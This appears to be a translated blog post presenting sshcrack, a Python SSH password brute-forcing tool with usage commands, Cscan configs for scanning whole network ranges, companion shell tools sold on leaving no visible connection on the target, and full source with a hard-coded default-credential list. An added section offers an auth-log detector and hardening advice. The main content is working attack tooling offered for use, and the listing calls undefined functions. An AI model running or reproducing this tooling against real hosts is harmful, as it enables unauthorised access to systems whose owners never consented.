0x000 Foreword
sshcrack is a command-line SSH password brute-forcing tool, suited to checking SSH passwords during internal-network penetration tests.
It can of course also be used for SSH password brute-forcing over the external network. It supports Windows and Linux; other systems are untested (see Tip1).
0x001 Contents
1. sshcrack usage
2. Cscan batch scanning
3. Connecting over SSH to run commands
4. sshcrack source
5. Download
0x002 Usage
Password detection against a specified SSH server
Weak password detection (-crack; the user and password arguments can be anything, because the account/password list is hard-coded)

    C:\Users\K8team\Desktop\Upload>sshcrack.exe 192.168.1.106 22 root k8gege -crack
    192.168.1.106 22 root toor LoginOK

Single password verification (-test)

    C:\Users\K8team\Desktop\Upload>sshcrack.exe 192.168.1.106 22 root toor -test
    192.168.1.106 22 root toor LoginOK
0x003 Batch SSH server password detection
0. Place Cscan.exe, Cscan.ini and sshcrack.exe in the same directory
Cscan.ini is as follows:
1. Brute-force weak passwords (when you currently have no password, or have obtained several account/password pairs)

    [Cscan]
    exe=sshcrack.exe
    arg=$ip$ 22 "" "" -crack

2. Verify a known password (quickly check whether other machines on the internal network use the same account and password)

    [Cscan]
    exe=sshcrack.exe
    arg=$ip$ 22 root k8gege -test

3. Cscan: scanning the machines of a single C, B or A segment

    cscan 192.168.1.108       (single IP)
    cscan 192.168.1.108/24    (C segment)
    cscan 192.168.1.108/16    (B segment)
    cscan 192.168.1.108/8     (A segment)

4. Cscan: batch scanning of IPs, C segments or B segments
Create an ip24.txt, ip16.txt or ip.txt file, then run cscan (no other parameters).
The following Cscan.ini specifies no port, because the SSH ports are non-22 ports identified by K8portscan.
Not specifying a port means ip.txt must list the corresponding SSH port for each entry.
0x004 Connecting over SSH to execute commands
1. sshshell interactive connection

    sshshell.exe 192.168.1.106 22 root toor

sshshell.exe is a single-file interactive SSH connection tool (advantage: like PuTTY, it keeps the session; disadvantage: like PuTTY, it stays connected).
2. sshcmd non-interactive command line
The advantage is that the session is logged out as soon as the command finishes (i.e., no network connection is visible on the target); it is intended for internal-network penetration.
3. Penetration edition SSH connection tool, GUI version
The advantage is that the session is logged out as soon as a command finishes running (i.e., no network connection is visible on the target). It is intended for penetration work and can connect to SSH either through a proxy from the internal network or over the external network.
It can of course also be used for everyday VPS management; the GUI version has file management and supports uploading and downloading single files or entire directories.
0x005 sshcrack source
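Hard-coding the passwords is recommended, because it makes batch scanning with Cscan easier; otherwise sshcrack has to read the password list again for every host scanned, which may affect batch efficiency.
The following is an example that you can modify yourself, adding password dictionaries to suit your own project. The script still needs improvement, for example stopping checks of the root user, or stopping brute-forcing altogether, once the root password has been found.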

    # sshcrack 1.0
    # author: k8gege
    # https://www.cnblogs.com/k8gege
    # https://github.com/k8gege
    import paramiko
    import sys
    import logging

    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts any unknown host key without verification
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    logging.raiseExceptions=False

    def checkSSH(host,port,user,pwd):
        try:
            ssh.connect(host,port,user,pwd)
            print(host+' '+port+' '+user+' '+pwd+' LoginOK')
            # checkDns() and checkPing() are not defined in this listing; the
            # NameError they raise is swallowed by the bare except below.
            checkDns()
            checkPing()
        except:
            pass

    # Arguments: host port user password mode
    host=sys.argv[1]
    port=sys.argv[2]
    user=sys.argv[3]
    pwd=sys.argv[4]
    type=sys.argv[5]

    if type=='-test':
        checkSSH(host,port,user,pwd)
    elif type=='-crack':
        # Hard-coded account/password list; user and pwd arguments are ignored
        checkSSH(host,port,'root','123456')
        checkSSH(host,port,'root','cisco')
        checkSSH(host,port,'root','Cisco')
        checkSSH(host,port,'admin','123456')
        checkSSH(host,port,'cisco','123456')
        checkSSH(host,port,'cisco','cisco')
        checkSSH(host,port,'Cisco','Cisco')
        checkSSH(host,port,'cisco','cisco123')
        checkSSH(host,port,'admin','admin')
        checkSSH(host,port,'root','Admin')
        checkSSH(host,port,'root','toor')
        checkSSH(host,port,'root','Admin123')
        checkSSH(host,port,'root','system')
        checkSSH(host,port,'root','system123')
        checkSSH(host,port,'root','System')
        checkSSH(host,port,'root','System123')
        checkSSH(host,port,'root','Admin123!@#')
        checkSSH(host,port,'root','root123!@#')
        checkSSH(host,port,'root','root2019')
        checkSSH(host,port,'root','root2018')
        checkSSH(host,port,'root','root2017')
        checkSSH(host,port,'root','root2016')
        checkSSH(host,port,'root','root2015')
        checkSSH(host,port,'root','root2014')
        checkSSH(host,port,'root','root2013')
        checkSSH(host,port,'root','root2012')
    else:
        checkSSH(host,port,user,pwd)

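On the defending side, a fixed list like the one in the script shows up in sshd's auth log as one source producing a burst of failures across root, admin and cisco. The detector below is an added example, not part of the original post or the k8gege tools; it assumes OpenSSH's standard "Failed password" syslog lines, and the thresholds, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH: "Failed password for [invalid user ]NAME from IP port N ssh2"
FAILED = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse(line, year=2019):
    """Return (timestamp, user, source_ip) or None; syslog omits the year."""
    m = FAILED.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3)

def detect(lines, window=timedelta(seconds=60), min_failures=8, min_users=3):
    """Flag sources with many failures across several usernames in one window."""
    events = defaultdict(list)
    for ts, user, ip in filter(None, map(parse, lines)):
        events[ip].append((ts, user))
    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            chunk = evs[start:end + 1]
            users = sorted({u for _, u in chunk})
            if len(chunk) >= min_failures and len(users) >= min_users:
                alerts[ip] = (len(chunk), users)
                break
    return alerts

# Constructed sample log; usernames follow the order of the list in the script.
_USERS = ["root", "root", "root", "admin", "cisco", "cisco", "Cisco", "cisco", "admin"]
SAMPLE = [
    f"Jun 10 03:14:{i:02d} host1 sshd[{4000 + i}]: Failed password for "
    f"{'' if u == 'root' else 'invalid user '}{u} from 192.0.2.50 port {50000 + i} ssh2"
    for i, u in enumerate(_USERS)
] + [
    "Jun 10 09:01:12 host1 sshd[5120]: Failed password for alice from 198.51.100.7 port 40112 ssh2",
    "Jun 10 09:01:20 host1 sshd[5120]: Accepted password for alice from 198.51.100.7 port 40112 ssh2",
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

Setting `PasswordAuthentication no` in sshd_config and using keys removes the exposure this list depends on; the detector then acts as a tripwire for hosts where that is not yet in place.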
0x006 Download
https://github.com/k8gege/sshshell
https://github.com/k8gege/K8tools
https://github.com/k8gege/K8CScan
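Tip1: Is a program written in Python necessarily cross-platform?
Python is a cross-platform language, but that does not mean a program written in Python necessarily supports every system.
Whether it does depends mainly on whoever wrote the code; for example, some dependency packages are only available on Linux or only on Windows.
If you call someone else's package directly, without modifying anything, do you think it is necessarily cross-platform???
Even functionality written using only native packages is not guaranteed to be fully compatible.
Some functionality needs different handling on different systems.
Tip2: Detailed description of the SSH connection tools
[Original] SSH connection tools for internal-network penetration: sshcmd/sshshell/SSH password cracking, and enabling SSH on Kali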
https://www.cnblogs.com/k8gege/p/10991264.html